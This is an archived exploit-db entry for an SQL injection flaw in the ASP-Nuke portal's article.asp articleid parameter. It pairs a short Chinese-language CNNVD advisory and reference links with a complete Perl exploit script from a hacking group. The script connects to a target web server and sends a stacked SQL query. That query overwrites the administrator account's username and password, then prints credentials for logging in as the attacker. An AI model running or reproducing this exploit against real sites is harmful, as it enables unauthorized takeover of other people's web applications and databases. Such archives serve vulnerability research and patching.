https://www.exploit-db.com/exploits/1070
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-217

ASP-Nuke是一款开放源码的软件应用，可在WebServer上运行基于社区的站点。ASP-Nuke处理用户请求时存在输入验证漏洞，远程攻击者可以利用此漏洞非授权访问数据库。ASP-Nuke的article.asp脚本没有正确过滤articleid参数数据，远程攻击可以在输入中插入特定的SQL语句，从而非授权操作数据库，导致敏感信息泄露或ASP-Nuke被完全控制。

#!/usr/bin/perl
######################################################################################
#        T r a p - S e t   U n d e r g r o u n d   H a c k i n g   T e a m
######################################################################################
# EXPLOIT FOR: ASPNuke ASP Portal
#
# Expl0it By: [email protected]
#
# Discovered By: Trap-Set Underground Hacking Team (oil_KarchacK)
#
######################################################################################
#  GR33tz T0 ==>    Alpha_programmer  --  oil_Karchack  --  the_CephaleX  -- Str0ke
#  And Iranian Security & Technical Sites:
#  IHS TeaM , alphaST , Shabgard Security Team  , Emperor Hacking Team  ,
#  Crouz Security Team , Hat-squad security team  & Simorgh-ev Security Team
######################################################################################
use IO::Socket;

if (@ARGV < 1)
{
 print "n==========================================n";
 print " n     -- Exploit By mh_p0rtal --nn";
 print "     Trap-Set Underground Hacking Team      nn";
 print "         Usage:ASPNuke.pl <T4rg3t> nn";
 print "==========================================nn";
 print "Examples:nn";
 print "   ASPNuke.pl www.Site.com n";
 exit();
}

my $host = $ARGV[0];
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host,
PeerPort => "80" );

unless ($remote) { die "C4nn0t C0nn3ct to $host" }

print "[+]C0nn3ctedn";

$addr = "GET /module/article/article/article.asp?articleid=1%20;%20update%20tbluser%20SET%20password='bf16c7ec063e8f1b62bf4ca831485ba0da56328f818763ed34c72ca96533802c'%20,%20username='trapset'%20where%20userID=1%20-- HTTP/1.0n";
$addr .= "Host: $hostnnnn";
print "n";
print $remote $addr;
print "[+]Wait...";
sleep(5);
print "Wait For Changing Password ...n";

print "[+]OK , Now Login With : n";
print "Username: trapsetn";
print "Password: trapsetnn";


# milw0rm.com [2005-06-27]

来源:BUGTRAQ
名称:20050627aspnukeisvulnerabletosqlinjection
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=111989828622112&w;=2
来源:BID
名称:18215
链接:http://www.securityfocus.com/bid/18215
来源:MISC
链接:http://downloads.securityfocus.com/vulnerabilities/exploits/ASPNuke-0601-sql.txt